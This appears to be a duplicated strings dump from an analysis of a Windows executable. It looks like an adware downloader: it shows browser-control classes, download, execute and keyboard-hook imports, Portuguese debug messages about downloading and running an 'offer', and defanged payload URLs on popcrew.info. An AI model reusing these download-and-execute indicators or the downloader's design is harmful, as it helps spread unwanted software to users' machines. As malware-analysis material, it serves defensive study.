@Shdocvw_tlb@TCppWebBrowser@OptParam
@Shdocvw_tlb@TCppWebBrowser@PutProperty$qqrpb10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@PutProperty$qqrpb10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@QueryStatusWB$qqr20Shdocvw_tlb@OLECMDID
@Shdocvw_tlb@TCppWebBrowser@QueryStatusWB$qqr20Shdocvw_tlb@OLECMDID
@Shdocvw_tlb@TCppWebBrowser@Quit$qqrv
@Shdocvw_tlb@TCppWebBrowser@Quit$qqrv
@Shdocvw_tlb@TCppWebBrowser@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser@SetWordBoolProp$qqrio
@Shdocvw_tlb@TCppWebBrowser@SetWordBoolProp$qqrio
@Shdocvw_tlb@TCppWebBrowser@ShowBrowserBar$qqrp10tagVARIANTt1t1
@Shdocvw_tlb@TCppWebBrowser@ShowBrowserBar$qqrp10tagVARIANTt1t1
@Shdocvw_tlb@TCppWebBrowser@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Parent$qqrv
@Shdocvw_tlb@TCppWebBrowser@get_Parent$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@
@Shdocvw_tlb@TCppWebBrowser_V1@
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrp6HWND__
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser_V1@$bctr$qqrpv
@Shdocvw_tlb@TCppWebBrowser_V1@CControlData
@Shdocvw_tlb@TCppWebBrowser_V1@CControlData
@Shdocvw_tlb@TCppWebBrowser_V1@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@CreateControl$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser_V1@DEF_CTL_INTF
@Shdocvw_tlb@TCppWebBrowser_V1@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser_V1@EventDispIDs
@Shdocvw_tlb@TCppWebBrowser_V1@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GetDefaultInterface$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoBack$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoForward$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoHome$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@GoSearch$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@InitControlData$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser_V1@Navigate$qqrpbp10tagVARIANTt2t2t2
@Shdocvw_tlb@TCppWebBrowser_V1@OptParam
@Shdocvw_tlb@TCppWebBrowser_V1@OptParam
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser_V1@Refresh2$qqrp10tagVARIANT
@Shdocvw_tlb@TCppWebBrowser_V1@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@Stop$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Application$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Container$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Document$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Parent$qqrv
@Shdocvw_tlb@TCppWebBrowser_V1@get_Parent$qqrv
@Shdocvw_tlb@TShellFavoritesNameSpace@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TShellFavoritesNameSpace@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
CppWebBrowser1DocumentComplete
CppWebBrowser1DocumentComplete
Lines.Strings
Lines.Strings
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
SetViewportOrgEx
SetViewportOrgEx
ShellExecuteA
ShellExecuteA
URLDownloadToFileA
URLDownloadToFileA
ActivateKeyboardLayout
ActivateKeyboardLayout
EnumThreadWindows
EnumThreadWindows
EnumWindows
EnumWindows
GetKeyNameTextA
GetKeyNameTextA
GetKeyState
GetKeyState
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardState
GetKeyboardState
GetKeyboardType
GetKeyboardType
LoadKeyboardLayoutA
LoadKeyboardLayoutA
MapVirtualKeyA
MapVirtualKeyA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
DeleteUrlCacheEntry
DeleteUrlCacheEntry
HttpOpenRequestA
HttpOpenRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
.text
.text
`.data
`.data
.rdata
.rdata
P.idata
P.idata
@.edata
@.edata
@.rsrc
@.rsrc
@.reloc
@.reloc
URLD
URLD
o~.djus
o~.djus
eUrl.ch
eUrl.ch
ADVAPI32.DLL
ADVAPI32.DLL
COMCTL32.DLL
COMCTL32.DLL
GDI32.DLL
GDI32.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
OLE32.DLL
OLE32.DLL
OLEAUT32.DLL
OLEAUT32.DLL
SHELL32.DLL
SHELL32.DLL
URLMON.DLL
URLMON.DLL
WININET.DLL
WININET.DLL
Text exceeds memo capacity/Menu '%s' is already being used by another form
Text exceeds memo capacity/Menu '%s' is already being used by another form
JPEG error #%d
JPEG error #%d
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant is not an array5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation!Invalid variant operation ($%.8x)
Invalid variant operation!Invalid variant operation ($%.8x)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
$%s not in a class registration group
$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
DCOM not installed!'%s' is not a valid integer value"'%s' is not a valid currency value!'%g' is not a valid date and time
DCOM not installed!'%s' is not a valid integer value"'%s' is not a valid currency value!'%g' is not a valid date and time
I/O error %d
I/O error %d
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file %s
Cannot create file %s
Cannot open file %s
Cannot open file %s
1.5.1.2
1.5.1.2
%original file name%.exe_1624_rwx_00401000_00109000:
TCppSearchAssistantOC
TCppSearchAssistantOC
TCppCScriptErrorListd%K
TCppCScriptErrorListd%K
TCppShellUIHelper
TCppShellUIHelper
TCppShellWindows\'K
TCppShellWindows\'K
TCppShellBrowserWindow
TCppShellBrowserWindow
OnWindowSetResizable8
OnWindowSetResizable8
OnWindowSetLeft8
OnWindowSetLeft8
OnWindowSetTop8
OnWindowSetTop8
OnWindowSetWidth8
OnWindowSetWidth8
OnWindowSetHeightd
OnWindowSetHeightd
TCppInternetExplorer
TCppInternetExplorer
TCppWebBrowserP)K
TCppWebBrowserP)K
TCppWebBrowser_V1
TCppWebBrowser_V1
strUrl
strUrl
TCppSearchAssistantOC *
TCppSearchAssistantOC *
TCppCScriptErrorList *
TCppCScriptErrorList *
TCppShellUIHelper *
TCppShellUIHelper *
TCppShellWindows *
TCppShellWindows *
TCppShellBrowserWindow *
TCppShellBrowserWindow *
TCppInternetExplorer *
TCppInternetExplorer *
TCppWebBrowser *
TCppWebBrowser *
TCppWebBrowser_V1 *
TCppWebBrowser_V1 *
TAutoDriver *
TAutoDriver *
TAutoDriver<:iwebbrowser2>
TAutoDriver<:iwebbrowser2>
Shdocvw_tlb::TCppWebBrowser_V1
Shdocvw_tlb::TCppWebBrowser_V1
Shdocvw_tlb::TCppWebBrowser
Shdocvw_tlb::TCppWebBrowser
Shdocvw_tlb::TCppInternetExplorer
Shdocvw_tlb::TCppInternetExplorer
Shdocvw_tlb::TCppShellBrowserWindow
Shdocvw_tlb::TCppShellBrowserWindow
Shdocvw_tlb::TCppShellWindows
Shdocvw_tlb::TCppShellWindows
Shdocvw_tlb::TCppShellUIHelper
Shdocvw_tlb::TCppShellUIHelper
Shdocvw_tlb::TCppCScriptErrorList
Shdocvw_tlb::TCppCScriptErrorList
Shdocvw_tlb::TCppSearchAssistantOC
Shdocvw_tlb::TCppSearchAssistantOC
TComInterface<:ishellwindows>
TComInterface<:ishellwindows>
TComInterface<:iwebbrowser2>
TComInterface<:iwebbrowser2>
Shdocvw_tlb::IWebBrowser2DispT<:iwebbrowser2>
Shdocvw_tlb::IWebBrowser2DispT<:iwebbrowser2>
Shdocvw_tlb::TCOMIWebBrowserT<:iwebbrowser>
Shdocvw_tlb::TCOMIWebBrowserT<:iwebbrowser>
TComInterface<:iwebbrowser>
TComInterface<:iwebbrowser>
TCOMIWebBrowser *
TCOMIWebBrowser *
IWebBrowser2Disp *
IWebBrowser2Disp *
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
UrlMon
UrlMon
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
ISupportErrorInfo
ISupportErrorInfo
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
ole32.dll
ole32.dll
Uh%SC
Uh%SC
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
kernel32.dll
kernel32.dll
EVariantBadIndexError
EVariantBadIndexError
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
olepro32.dll
olepro32.dll
BiDiModexeF
BiDiModexeF
OnKeyDown ^G
OnKeyDown ^G
OnKeyPress
OnKeyPress
OnKeyUp,]G
OnKeyUp,]G
ssHorizontal
ssHorizontal
AutoHotkeys
AutoHotkeys
EInvalidGraphicOperation
EInvalidGraphicOperation
KeyPreview
KeyPreview
WindowState
WindowState
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Proportional
Proportional
HelpKeyword
HelpKeyword
TDragOperation
TDragOperation
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
crSQLWait
crSQLWait
%s (%s)
%s (%s)
IMM32.DLL
IMM32.DLL
%u8F3
%u8F3
%USERPROFILE%\desktop\
%USERPROFILE%\desktop\
1.5.1.0
1.5.1.0
URL_COMUNICACAO:
URL_COMUNICACAO:
hXXp://download.popcrew.info/popdeals4.exe
hXXp://download.popcrew.info/popdeals4.exe
hXXp://download.popcrew.info/popdeals3.exe
hXXp://download.popcrew.info/popdeals3.exe
1\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals
1\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals
.jpeg
.jpeg
urlopen:
urlopen:
c:\program files (x86)\borland\cbuilder6\include\vcl\utilcls.h
c:\program files (x86)\borland\cbuilder6\include\vcl\utilcls.h
%s @ %s/%d
%s @ %s/%d
%s failed - %s/%d
%s failed - %s/%d
CppWebBrowser1
CppWebBrowser1
CppWebBrowser1DocumentComplete%
CppWebBrowser1DocumentComplete%
CppWebBrowser1TitleChange
CppWebBrowser1TitleChange
CppWebBrowser1NavigateError
CppWebBrowser1NavigateError
OpenWebSite
OpenWebSite
TCppCScriptErrorList
TCppCScriptErrorList
TCppShellWindows
TCppShellWindows
TCppWebBrowser
TCppWebBrowser
DOWNLOAD_URL:
DOWNLOAD_URL:
DW(14) URL que ele vai abrir apos o download:
DW(14) URL que ele vai abrir apos o download:
javascript:downloadProgress(%d,%d,0,%d);
javascript:downloadProgress(%d,%d,0,%d);
DW(1) Download da oferta (primeira URL):
DW(1) Download da oferta (primeira URL):
DW(1) Download da oferta (segunda URL):
DW(1) Download da oferta (segunda URL):
DW(4) Vai executar a oferta:
DW(4) Vai executar a oferta:
cp:%d][blocked:1
cp:%d][blocked:1
cp:%d][start:1
cp:%d][start:1
cp:%d][key:try(%d)
cp:%d][key:try(%d)
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%s%s(0%d)%s
%s%s(0%d)%s
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
{374DE290-123F-4565-9164-39C4925E467B}
{374DE290-123F-4565-9164-39C4925E467B}
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
36746191
36746191
.xyzxyzxyz
.xyzxyzxyz
hXXp://%[^/]%s
hXXp://%[^/]%s
%s/%s/?s1=
%s/%s/?s1=
id=%s
id=%s
tmpfile.tmp
tmpfile.tmp
KERNEL32.DLL
KERNEL32.DLL
Windows 8
Windows 8
Windows 7
Windows 7
Windows Vista
Windows Vista
Windows Server 2012
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008 R2
Windows Server 2008
Windows Server 2008
Windows Server 2003
Windows Server 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
Windows NT4
Windows NT4
Windows NT 3.x
Windows NT 3.x
Windows NT (Indefinido)
Windows NT (Indefinido)
Windows 95A
Windows 95A
Windows 95B
Windows 95B
Windows 95C
Windows 95C
Windows 95
Windows 95
Windows 98A
Windows 98A
Windows 98SE
Windows 98SE
Windows 98
Windows 98
Windows ME
Windows ME
Windows 9x (Indefinido)
Windows 9x (Indefinido)
%.2X%s
%.2X%s
http\shell\open\command
http\shell\open\command
firefox
firefox
mozilla
mozilla
Mozilla
Mozilla
opera
opera
Opera
Opera
chrome
chrome
Chrome
Chrome
explorer.exe /n,/select,
explorer.exe /n,/select,
DW(8) Linha de comando a ser executada:
DW(8) Linha de comando a ser executada:
DW(9) Execucao com problemas:
DW(9) Execucao com problemas:
qhXXp://ns.adobe.com/xap/1.0/
qhXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
SHDocVw_OCX.cpp
SHDocVw_OCX.cpp
c:\bcb\emuvcl\utilcls.h
c:\bcb\emuvcl\utilcls.h
'%s': %s @ %s/%d
'%s': %s @ %s/%d
(%s) Error: %lX (%ld) @ %s/%d
(%s) Error: %lX (%ld) @ %s/%d
this->QueryStatusWB(cmdID, (Shdocvw_tlb::OLECMDF*)&pcmdf)
this->QueryStatusWB(cmdID, (Shdocvw_tlb::OLECMDF*)&pcmdf)
F%D,3
F%D,3
xxtype.cpp
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
Operation not permitted
Operation not permitted
%H:%M:%S
%H:%M:%S
%m/%d/%y
%m/%d/%y
%A, %B %d, %Y
%A, %B %d, %Y
d/d/d d:d:d.d
d/d/d d:d:d.d
xx.cpp
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
elemType->tpClass.tpcFlags & CF_HAS_DTOR
_noParam.vt == VT_ERROR
_noParam.vt == VT_ERROR
VARIANT.CPP
VARIANT.CPP
_empty.vt == VT_EMPTY
_empty.vt == VT_EMPTY
vt == rhs.vt
vt == rhs.vt
Inv(%d) %s, 0x%lX, retVT(0x%X), ErrArg(%d)
Inv(%d) %s, 0x%lX, retVT(0x%X), ErrArg(%d)
Parms.vt == (VT_ARRAY|VT_VARIANT)
Parms.vt == (VT_ARRAY|VT_VARIANT)
ParmTypes.vt == (VT_ARRAY|VT_I4)
ParmTypes.vt == (VT_ARRAY|VT_I4)
multiinstall.exe
multiinstall.exe
@$xp$26Shdocvw_tlb@TCppWebBrowser
@$xp$26Shdocvw_tlb@TCppWebBrowser
@$xp$28Shdocvw_tlb@TCppShellWindows
@$xp$28Shdocvw_tlb@TCppShellWindows
@$xp$29Shdocvw_tlb@TCppShellUIHelper
@$xp$29Shdocvw_tlb@TCppShellUIHelper
@$xp$29Shdocvw_tlb@TCppWebBrowser_V1
@$xp$29Shdocvw_tlb@TCppWebBrowser_V1
@$xp$32Shdocvw_tlb@TCppCScriptErrorList
@$xp$32Shdocvw_tlb@TCppCScriptErrorList
@$xp$32Shdocvw_tlb@TCppInternetExplorer
@$xp$32Shdocvw_tlb@TCppInternetExplorer
@$xp$33Shdocvw_tlb@TCppSearchAssistantOC
@$xp$33Shdocvw_tlb@TCppSearchAssistantOC
@$xp$34Shdocvw_tlb@TCppShellBrowserWindow
@$xp$34Shdocvw_tlb@TCppShellBrowserWindow
@Shdocvw_tlb@TCppCScriptErrorList@
@Shdocvw_tlb@TCppCScriptErrorList@
@Shdocvw_tlb@TCppCScriptErrorList@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppCScriptErrorList@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppCScriptErrorList@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@Connect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@Connect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@ConnectTo$qqr91%TComInterface$28Shdocvw_tlb@IScriptErrorListpx5_GUID$e&@Shdocvw_tlb@IID_IScriptErrorList$%
@Shdocvw_tlb@TCppCScriptErrorList@ConnectTo$qqr91%TComInterface$28Shdocvw_tlb@IScriptErrorListpx5_GUID$e&@Shdocvw_tlb@IID_IScriptErrorList$%
@Shdocvw_tlb@TCppCScriptErrorList@Disconnect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@Disconnect$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@GetDefaultInterface$qv
@Shdocvw_tlb@TCppCScriptErrorList@GetDefaultInterface$qv
@Shdocvw_tlb@TCppCScriptErrorList@GetDunk$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@GetDunk$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@InitServerData$qqrv
@Shdocvw_tlb@TCppCScriptErrorList@InitServerData$qqrv
@Shdocvw_tlb@TCppInternetExplorer@
@Shdocvw_tlb@TCppInternetExplorer@
@Shdocvw_tlb@TCppInternetExplorer@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppInternetExplorer@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppInternetExplorer@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppInternetExplorer@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppInternetExplorer@Connect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@Connect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppInternetExplorer@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppInternetExplorer@Disconnect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@Disconnect$qqrv
@Shdocvw_tlb@TCppInternetExplorer@GetDefaultInterface$qv
@Shdocvw_tlb@TCppInternetExplorer@GetDefaultInterface$qv
@Shdocvw_tlb@TCppInternetExplorer@GetDunk$qqrv
@Shdocvw_tlb@TCppInternetExplorer@GetDunk$qqrv
@Shdocvw_tlb@TCppInternetExplorer@InitServerData$qqrv
@Shdocvw_tlb@TCppInternetExplorer@InitServerData$qqrv
@Shdocvw_tlb@TCppInternetExplorer@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppInternetExplorer@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppSearchAssistantOC@
@Shdocvw_tlb@TCppSearchAssistantOC@
@Shdocvw_tlb@TCppSearchAssistantOC@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppSearchAssistantOC@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppSearchAssistantOC@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@Connect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@Connect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@ConnectTo$qqr97%TComInterface$31Shdocvw_tlb@ISearchAssistantOC3px5_GUID$e&@Shdocvw_tlb@IID_ISearchAssistantOC3$%
@Shdocvw_tlb@TCppSearchAssistantOC@ConnectTo$qqr97%TComInterface$31Shdocvw_tlb@ISearchAssistantOC3px5_GUID$e&@Shdocvw_tlb@IID_ISearchAssistantOC3$%
@Shdocvw_tlb@TCppSearchAssistantOC@Disconnect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@Disconnect$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDefaultInterface$qv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDefaultInterface$qv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDunk$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@GetDunk$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@InitServerData$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@InitServerData$qqrv
@Shdocvw_tlb@TCppSearchAssistantOC@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppSearchAssistantOC@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellBrowserWindow@
@Shdocvw_tlb@TCppShellBrowserWindow@
@Shdocvw_tlb@TCppShellBrowserWindow@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellBrowserWindow@$bctr$qqrp18Classes@TComponent
@Shdocvw_tlb@TCppShellBrowserWindow@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@BeforeDestruction$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@Connect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@Connect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppShellBrowserWindow@ConnectTo$qqr83%TComInterface$24Shdocvw_tlb@IWebBrowser2px5_GUID$e&@Shdocvw_tlb@IID_IWebBrowser2$%
@Shdocvw_tlb@TCppShellBrowserWindow@Disconnect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@Disconnect$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDefaultInterface$qv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDunk$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@GetDunk$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@InitServerData$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@InitServerData$qqrv
@Shdocvw_tlb@TCppShellBrowserWindow@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellBrowserWindow@InvokeEvent$qqrir42System@%DynamicArray$t17System@OleVariant%
@Shdocvw_tlb@TCppShellUIHelper@
@Shdocvw_tlb@TCppShellUIHelper@
